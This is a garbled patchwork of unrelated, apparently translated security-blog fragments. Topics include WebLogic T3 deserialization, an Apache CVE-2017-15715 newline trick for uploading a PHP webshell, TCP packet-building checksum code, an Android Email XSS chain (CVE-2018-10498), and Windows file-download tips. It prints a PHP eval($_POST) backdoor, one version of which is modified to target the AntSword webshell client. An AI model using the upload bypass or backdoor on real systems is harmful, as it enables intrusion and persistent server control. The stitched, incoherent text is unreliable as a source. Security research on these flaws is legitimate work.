T3 Muxer deserializes socket data
process is called repeatedly.
It creates ms, a MuxableSocketT3, then follows into readReadySocket, where the connection is handled; that in turn calls readReadySocketOnce, where the handling continues, and then calls dispatch to proceed with the call.
ms is obtained here by parsing the incoming data, which is then dispatched to the corresponding handlers; based on the data received, the protocol is determined and the matching connection handler is returned, creating the related NIOSocketMuxer / socket / MuxableSocketDiscriminator / Muxer objects.
Bypassing blacklist getshell
Uploading a normal PHP file is blocked.
You can upload 1.php.xxx, but it is not parsed as PHP, which shows that the old Apache multiple-extension parsing issue is not present.
We use CVE-2017-15715 to upload a file whose name contains a newline character. Note that it must be \x0A only, not \x0D\x0A: in affected Apache versions the trailing $ of the FilesMatch regex also matches just before a final newline, so the file is still handed to the PHP handler. We therefore use the hex function to append a \x0A after 1.php, then access /1.php%0A, and you will find that getshell succeeds.
Interactive Shell under WebShell
Starting from how commands are currently executed from a webshell
Here we mainly discuss the Linux platform and leave Windows aside for now (mainly because it has not been studied yet).
Executing commands in web scripts
In a webshell you often see command execution, virtual terminal and similar functions that run system commands. The principle is to use functions provided by the scripting language itself, such as system, popen and shell_exec, to execute the command.
This method does not preserve any session context between calls, so it becomes quite inconvenient for commands that require user interaction, for example the passwd command.
Assembling the TCP protocol: template_set_target(), partial code
    case Proto_TCP:
        /* TCP header starts at offset_tcp; ports are written big-endian */
        px[offset_tcp+ 0] = (unsigned char)(port_me >> 8);
        px[offset_tcp+ 1] = (unsigned char)(port_me & 0xFF);
        px[offset_tcp+ 2] = (unsigned char)(port_them >> 8);
        px[offset_tcp+ 3] = (unsigned char)(port_them & 0xFF);
        /* 32-bit sequence number, big-endian */
        px[offset_tcp+ 4] = (unsigned char)(seqno >> 24);
        px[offset_tcp+ 5] = (unsigned char)(seqno >> 16);
        px[offset_tcp+ 6] = (unsigned char)(seqno >> 8);
        px[offset_tcp+ 7] = (unsigned char)(seqno >> 0);
        /* Incremental checksum: start from the checksum precomputed for the
           template and add only the fields that vary per target (pseudo-header
           addresses, ports, sequence number). 32-bit values are added whole;
           the folds below split them into 16-bit words. */
        xsum += (uint64_t)tmpl->checksum_tcp
              + (uint64_t)ip_me
              + (uint64_t)ip_them
              + (uint64_t)port_me
              + (uint64_t)port_them
              + (uint64_t)seqno;
        /* end-around carry: fold the 64-bit sum back into 16 bits */
        xsum = (xsum >> 16) + (xsum & 0xFFFF);
        xsum = (xsum >> 16) + (xsum & 0xFFFF);
        xsum = (xsum >> 16) + (xsum & 0xFFFF);
        /* ones' complement gives the final checksum value */
        xsum = ~xsum;
Bug 3: … and file:/// cross-domain
Although in Bug 2 we confirmed that this XSS indeed exists, there are still some issues with introducing a JS exploit through this XSS and obtaining code execution privileges (shell). Typically, if the EML file itself is too large, it will affect the WebView heap layout, thereby reducing the success rate of heap feng shui. However, the Email app did not disappoint; it enabled setAllowFileAccessFromFileUrls, which means we can split the JS exploit into separate files and reference them via script src, thus minimizing the size of the EML file as much as possible to improve the success rate of the V8 vulnerability. A small tip: combining Bug 2 and Bug 3 already allows arbitrary reading of private Email files. This vulnerability was assigned CVE-2018-10498. Therefore, we now construct the sample attack EML file as shown below.
2. serialFilter assignment process
Let's see how WebLogic initializes this value. When WebLogic starts the T3 server, it initializes the filter. During initialization it first instantiates the class, here JreFilterApiProxy.
Before initialization, both FilterProperties and BlacklistProperties are null and both return false, so the processDefaultConfiguration method is called.
Code injection:
Assuming o.php is the backdoor left by the hacker:
    <?php
    // runs whatever PHP code is POSTed in the s parameter
    eval(''.$_POST['s']);
    ?>
Because AntSword collects the cookies from each response, the backdoor needs to call the header function:
    <?php
    eval(''.$_POST['s']);
    // the response cookie carries an HTML tag, which AntSword picks up
    header("set-cookie:aaa=<img id=\"1\">;");
    ?>
Three Tips for Arbitrary File Download on Windows
I saw two ideas proposed in the group, did some simple tests, and added a new idea of my own.
Since the files to be read are used by system services or belong to other users, SYSTEM or administrator privileges are generally required.